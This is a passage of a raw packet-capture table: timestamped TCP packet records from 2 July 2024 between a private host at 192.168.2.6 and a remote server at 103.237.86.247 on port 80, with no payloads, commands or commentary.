                  Jul 2, 2024 07:48:56.577287912 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577301025 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577353954 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577359915 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.577366114 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577379942 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577392101 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577426910 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.577446938 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.577593088 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577636957 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.577919006 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577984095 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.577992916 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.578037024 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.909495115 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.909533978 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.909547091 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.909612894 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.909687996 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.909702063 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.909713984 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.909730911 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.909743071 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.909744978 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.909759045 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.909797907 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.910096884 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.910109997 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.910121918 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.910132885 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.910144091 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.910147905 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.910161018 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.910166979 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.910175085 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.910207987 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.910471916 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.910512924 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.094268084 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094376087 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094388962 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094402075 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094429016 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.094466925 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.094477892 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094527006 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094537973 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094561100 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.094710112 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094731092 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.094748974 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.095324993 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.095362902 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.095402002 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.095413923 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.095447063 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.095813036 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.095886946 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.095897913 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.095921040 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.096049070 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.096061945 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.096092939 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.096687078 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.096721888 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.096745968 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.096762896 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.096796036 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.096934080 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.096946955 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.096976042 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.097548962 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.139309883 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.182818890 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.233220100 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.352942944 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.352960110 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.352977037 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353050947 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353068113 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.353113890 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353120089 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.353127956 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353138924 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353173971 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.353353024 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353394985 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.353434086 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353446960 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353486061 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.353620052 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353631020 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353641987 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353653908 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.353663921 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.353686094 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.353894949 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.354259014 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.354299068 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.354342937 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.354353905 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.354382992 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.354487896 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.354499102 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.354509115 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.354513884 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.354556084 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.355011940 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.355092049 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.355109930 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.355134010 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.355271101 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.355287075 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.355298042 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.355309963 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.355309963 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.355331898 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.355519056 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.355565071 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.355979919 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.356039047 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.356050014 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.356075048 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.404906988 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.611175060 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611193895 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611289024 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611330986 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.611358881 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611371040 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611409903 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.611438036 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611474037 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.611557961 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611569881 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611605883 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.611701012 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611711979 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611757994 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.611778021 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611891985 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611902952 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.611932993 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.612102985 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612119913 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612148046 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.612291098 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612302065 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612313032 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612334967 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.612361908 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.612447977 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612478018 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612494946 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612509012 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612519026 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.612541914 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.612750053 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612761974 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.612801075 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.612977982 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613040924 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613051891 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613074064 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.613157034 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613194942 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.613244057 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613256931 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613297939 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.613400936 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613411903 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613421917 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613434076 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613442898 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.613467932 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.613729000 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613740921 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613751888 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613761902 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.613780975 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.613806009 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.614044905 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.614113092 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.614125013 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.614147902 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.614299059 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.614309072 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.614320993 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.614336967 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.614340067 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.614370108 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.614543915 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.614583969 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.869905949 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.869936943 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.869968891 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870021105 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870053053 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.870088100 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.870115995 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870213985 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870227098 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870250940 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.870362043 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870373964 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870400906 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.870724916 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870734930 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870745897 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870767117 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.870789051 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.870852947 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870863914 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.870908976 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.871047020 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871059895 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871071100 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871093035 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.871222973 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871236086 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871247053 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871254921 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.871282101 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.871560097 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871572018 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871582985 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871607065 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.871886969 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871898890 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.871921062 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872051954 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872067928 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872082949 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872240067 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872256994 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872268915 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872277021 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872281075 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872292995 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872298002 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872306108 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872325897 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872517109 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872526884 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872538090 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872549057 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872555017 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872562885 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872569084 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872577906 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872612000 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872656107 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872668028 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872678995 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872689962 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872692108 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872701883 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872713089 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.872714043 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.872740984 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873042107 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873075962 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873234034 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873245001 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873255968 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873266935 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873276949 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873281002 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873301983 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873418093 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873430967 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873444080 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873450041 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873478889 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.873867035 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873878002 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.873914957 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.874924898 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.874960899 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.874972105 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.874994040 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.875159025 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.875171900 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.875194073 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.920675039 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:57.958405018 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:57.998753071 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.128529072 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128566027 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128577948 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128638029 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.128736019 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128747940 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128760099 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128771067 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.128787041 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.128820896 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.128988028 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129000902 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129012108 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129024029 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129048109 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129060030 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129314899 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129328012 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129339933 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129362106 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129375935 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129584074 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129596949 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129607916 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129620075 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129632950 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129636049 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129646063 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129659891 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129667044 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129672050 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.129688978 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.129724026 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130112886 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130126953 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130137920 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130162954 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130354881 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130373955 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130384922 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130395889 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130403996 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130410910 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130414009 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130424976 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130438089 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130450964 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130461931 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130465031 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130479097 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.130492926 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.130501986 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131103992 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131115913 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131128073 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131139994 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131151915 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131154060 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.131165028 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.131179094 CEST8049711103.237.86.247192.168.2.6
